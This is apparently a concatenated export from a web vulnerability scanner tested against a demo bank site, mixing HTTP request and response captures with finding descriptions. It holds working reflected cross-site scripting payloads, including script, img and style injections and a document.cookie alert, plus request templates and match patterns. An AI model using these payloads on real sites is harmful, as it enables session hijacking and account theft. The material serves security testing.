<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /forgot.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes3=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>So you forgot you password hey? Give us your e-mail address and we will e-mail it to you</center></a></b></td></tr>
<FORM ACTION="forgot1.asp" METHOD="get">
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">e-Mail address: <INPUT TYPE="text" size="20" NAME="get"></INPUT> </TD>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="javascript:document.forms[0].submit()">Remind Me</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Non Persistent CookiesCookies are small bits of data that are sent by the web
application but stored locally in the browser. This lets the application
use the cookie to pass information between pages and store variable
information. The web application controls what information is stored in a
cookie and how it is used. Typical types of information stored in cookies
are session Identifiers, personalization and customization information, and
in rare cases even usernames to enable automated logins. <br><br>There are
two different types of cookies: <i>session cookies</i> and <i>persistent
cookies</i>. Session cookies just live In the browser's memory, and are not
stored anywhere. Persistent cookies, however are stored on the browser's
hard drive. This can cause security and privacy issues depending on the
information stored in the cookie and how it is accessed.Remove all 'Expires=' tags from cookies, and ensure
that any COTS software being used does not use the tag (and thus use
persistent cookies). In the case of COTS, it may be necessary to write
custom code that capture the set-cookie statement coming from the COTS and
modifies it to a compliant state.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 108
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data --><script>alert('XSS')</script><br>Please try again.
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack>--><script>alert('XSS')</script></attack>--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=1"style="background:url(javascript:alert('XSS'))"%20"&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /join.asp?name=&email=&surname=&house=&street=</textarea><script>alert('XSS')</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=<attack></textarea><script>alert('XSS')</script></attack>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /forgot2.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1657
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Non Persistent CookiesCookies are small bits of data that are sent by the web
application but stored locally in the browser. This lets the application
use the cookie to pass information between pages and store variable
information. The web application controls what information is stored in a
cookie and how it is used. Typical types of information stored in cookies
are session Identifiers, personalization and customization information, and
in rare cases even usernames to enable automated logins. <br><br>There are
two different types of cookies: <i>session cookies</i> and <i>persistent
cookies</i>. Session cookies just live In the browser's memory, and are not
stored anywhere. Persistent cookies, however are stored on the browser's
hard drive. This can cause security and privacy issues depending on the
information stored in the cookie and how it is accessed.Remove all 'Expires=' tags from cookies, and ensure
that any COTS software being used does not use the tag (and thus use
persistent cookies). In the case of COTS, it may be necessary to write
custom code that capture the set-cookie statement coming from the COTS and
modifies it to a compliant state.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
GET /login/login.asp?Action=Login&UserName=test@<script>alert(document.cookie)</script>.com&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:54 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 371
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: test@<script>alert(document.cookie)</script>.com</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?Action=Login&UserName=<attack>test@<script>alert(document.cookie)</script>.com</attack>&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /join.asp?name=>"><script>alert('XSS')</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
